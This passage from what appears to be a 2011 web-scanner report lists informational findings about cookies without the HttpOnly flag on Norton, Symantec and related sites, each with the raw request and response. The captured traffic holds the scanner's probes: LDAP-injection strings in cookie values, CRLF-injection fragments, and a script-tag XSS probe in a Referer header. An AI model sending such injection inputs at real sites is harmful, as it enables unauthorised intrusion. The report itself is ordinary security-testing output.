Certain
Host:
http://buy.norton.com
Path:
/support
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://www.norton.com/onlinehelpSet-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; 
expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 259 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://www.norton.com/onlinehelp">...[SNIP]...
10.47. http://buy.symanteccloud.com/freetrial
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.symanteccloud.com
Path:
/freetrial
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /freetrial HTTP/1.1 Host: buy.symanteccloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://buy.symanteccloud.com/estore/mf/smbEmailTrialPage?sfid=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439!1315604301412 Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMTSet-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMTSet-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: JSESSIONID=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Content-Length: 471 <html><head><title>302 Moved 
Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.symanteccloud.com/estor...[SNIP]...
10.48. http://buy.symanteccloud.com/smbstore
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.symanteccloud.com
Path:
/smbstore
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smbstore HTTP/1.1 Host: buy.symanteccloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://buy.symanteccloud.com/estore/mf/smbHomePage?sfid=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439!1315604301665 Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMTSet-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMTSet-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: JSESSIONID=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Content-Length: 459 <html><head><title>302 Moved Temporarily</title></head> 
<body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.symanteccloud.com/estor...[SNIP]...
10.49. http://com-verisign.netmng.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://com-verisign.netmng.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
evo5_VERISIGN=xep22ngsyerii%7ChA01%2FrwSc8JE1KL%2BNF3RVTo25kmnDoHeqB4wQZyhagZZu%2F%2BudZozezKeJLE7KBK%2BUjUxXlIeDROFZHLovHD35a7MzKnV4tnniULPz80oJzXTjZCQuH3rEYszto4j5kdWKlao%2B92ozzrCF1iFudKJH42aETL2etzFNY%2F7zPIZWcbiqGvcagHruGjsS4FSqBNpnzLrgd77H3EQG8j%2FXWqODQ%3D%3D; expires=Sat, 10-Mar-2012 21:24:39 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?async=1&ref= HTTP/1.1 Host: com-verisign.netmng.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN=xep22ngsyerii%7CzPCBedpYRoO6OzhXoTF9q%2FaQjQpstH0WqFCxsh5%2B48J3547ECvJaebMq81oWRc3MP36Ne8FDKqi2tKvM0qAtvn5eUZVLjXQuMBCzsj9xlU6q8vkojmNUdsxdhJSq0RYJ%2FgEF5%2FA69puw0HLQJ9EPXM6sL1Ue6IGucoZYZgTJQnZo9CTdABHM4ueiLU%2FDJA8GIJKj5bIIOmyH%2FBCLQ0VIEg%3D%3D
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:39 GMT Server: Apache/2.2.9 P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Wed, 07 Sep 2011 21:24:39 GMT Last-Modified: Wed, 07 Sep 2011 21:24:39 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cacheSet-Cookie: evo5_VERISIGN=xep22ngsyerii%7ChA01%2FrwSc8JE1KL%2BNF3RVTo25kmnDoHeqB4wQZyhagZZu%2F%2BudZozezKeJLE7KBK%2BUjUxXlIeDROFZHLovHD35a7MzKnV4tnniULPz80oJzXTjZCQuH3rEYszto4j5kdWKlao%2B92ozzrCF1iFudKJH42aETL2etzFNY%2F7zPIZWcbiqGvcagHruGjsS4FSqBNpnzLrgd77H3EQG8j%2FXWqODQ%3D%3D; expires=Sat, 10-Mar-2012 21:24:39 GMT; path=/ Content-Length: 3418 Connection: close Content-Type: text/html; charset=UTF-8 function json_encode(expr){var str='';switch(typeof(expr)){case"object":if(expr==null){str="null"}else if(expr.constructor==Date){str="\""+expr.getFullYear()+"-"+String(exp.getMonth()+100).substr(1)+"...[SNIP]...
10.50. http://com-verisign.netmng.com//
Summary
Severity: Information
Confidence: Certain
Host: http://com-verisign.netmng.com
Path: //
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T; expires=Sat, 10-Mar-2012 21:28:22 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET //?function=nmHandshake&rand=0.2648393476847559&nm_input_data= HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:22 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:28:22 GMT
Last-Modified: Wed, 07 Sep 2011 21:28:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T; expires=Sat, 10-Mar-2012 21:28:22 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
10.51. http://free.pctools.com/res/js/utils.php
Summary
Severity: Information
Confidence: Certain
Host: http://free.pctools.com
Path: /res/js/utils.php
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com
reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /res/js/utils.php HTTP/1.1
Host: free.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://free.pctools.com/free-antivirus36661%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E55a70ea0c85/
Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2
Response
HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 22:05:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 22:05:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com
Set-Cookie: reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com
10.52. http://mbox3.offermatica.com/m2/verisign/mbox/standard
Summary
Severity: Information
Confidence: Certain
Host: http://mbox3.offermatica.com
Path: /m2/verisign/mbox/standard
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 154
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");
10.53. https://onlinefamily.norton.com/familysafety/basicpremium.fs
Summary
Severity: Information
Confidence: Certain
Host: https://onlinefamily.norton.com
Path: /familysafety/basicpremium.fs
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
formVersion=1315604730862; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /familysafety/basicpremium.fs HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:30 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:30 GMT; Path=/
Set-Cookie: formVersion=1315604730862; Path=/
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 41316

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Web Moni...[SNIP]...
10.54. http://renewals.symantec.com/renewals/application
Summary
Severity: Information
Confidence: Certain
Host: http://renewals.symantec.com
Path: /renewals/application
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
entryURL=/renewals/application
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /renewals/application HTTP/1.1
Host: renewals.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:21 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application
Connection: close
Content-Length: 21430

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<!-- BEGIN ...[SNIP]...
10.55. https://renewals.symantec.com/renewals/application
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/application
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:50 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
Content-Length: 21436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<!-- BEGIN ...[SNIP]...
10.56. http://sales.liveperson.net/hc/2735064/
Summary
Severity: Information
Confidence: Certain
Host: http://sales.liveperson.net
Path: /hc/2735064/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
HumanClickKEY=3716944001314187740; path=/hc/2735064
HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Nort